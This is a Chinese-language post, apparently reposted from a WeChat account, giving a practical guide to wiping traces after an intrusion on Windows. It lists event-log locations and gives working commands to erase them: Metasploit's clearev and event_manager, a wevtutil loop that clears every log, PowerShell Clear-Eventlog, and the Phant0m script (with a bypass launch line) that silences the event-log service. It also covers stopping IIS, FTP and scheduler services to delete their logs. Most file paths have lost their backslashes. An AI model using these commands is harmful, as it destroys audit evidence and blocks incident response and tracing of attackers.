日志
我们电脑被入侵之后,运维人员想看如何被入侵的、想溯源攻击者都是通过看日志,发现蛛丝马迹顺着网线爬过去。反之我们不想被发现咋入侵的,就需要删除日志,防止被溯源。
WIN日志
win日志记录着Win系统及其各种服务运行的每个细节,对增强Windows的稳定和安全性,起着非常重要的作用。
系统日志:
记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据。
c:windowssystem32winevtLogsSystem.evtx应用程序日志:
包含应用程序或系统程序记录的事件,主要记录程序运行方面的事件。
C:windowssystem32winevtLogsApplication.evtx安全日志:
记录系统的安全审计事件,包含各种类型的登陆日志、对象访问日志、进程追踪日志、特权使用、账号管理、策略变更和系统事件。
c:windowssystem32winevtLogsSecurity.evtx清理日志
msf
使用msf框架完成渗透后,使用clearev命令清除日志
也可以使用事件管理模块清除日志(我没运行成功)
-i参数显示事件信息
run event_manager -i-c参数清除所有日志
run event_manager -c可清除指定日志
run event_manager -c systemwevtutil+for循环清除所有日志
Wevtutil是用来查看事件的系统工具,可以卸载事件清单,导出,归档和清除日志
for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"
最后留下一个ID为1102的日志清除事件
ps批量删日志
如果反弹shell是ps弹的,可以使用ps命令来删除日志
wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}
使用PS清理指定的系统日志
Clear-Eventlog -LogName SecurityClear-Eventlog -LogName System
Phant0m脚本
这个脚本是用来杀死日志服务的,在日志服务进程中检测并杀死负责事件日志服务的线程,这样日志服务虽然运行但没法记录日志(畅游无阻)
下载地址:https://github.com/hlldz/Phant0m
powershell –exec bypass –Command "& {Import-Module 'C:Invoke-Phant0m.ps1';Invoke-Phant0m}"
其他日志
IIS日志
iis默认会每天记录一次日志,能记录下我们详细的入侵过程
systemroot%system32logfilesw3svc1在该目录下删除指定日期的日志
如果无法删除文件,首先需要停止w3svc服务,再删除即可
net stop w3svc不同的 Win版本iis日志路径不一样,这里列出几个
C:WindowsSystem32LogFiles #win_s_2003C:inetpublogsLogFiles # win_s_2008r2
apache日志
apache默认日志在安装目录下的logs目录中
D:phpStudyApachelogs
FTP日志
默认每天一个日志,清理当天日志即可
systemroot%system32logfilesmsftpsvc1计划任务日志
计划任务也会记录各种日志
systemroot%Tasksschedlgu.txt删除时提示无法访问,需要把服务先关闭
net stop schedule原文始发于微信公众号(南街老友):痕迹清理-Win日志
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论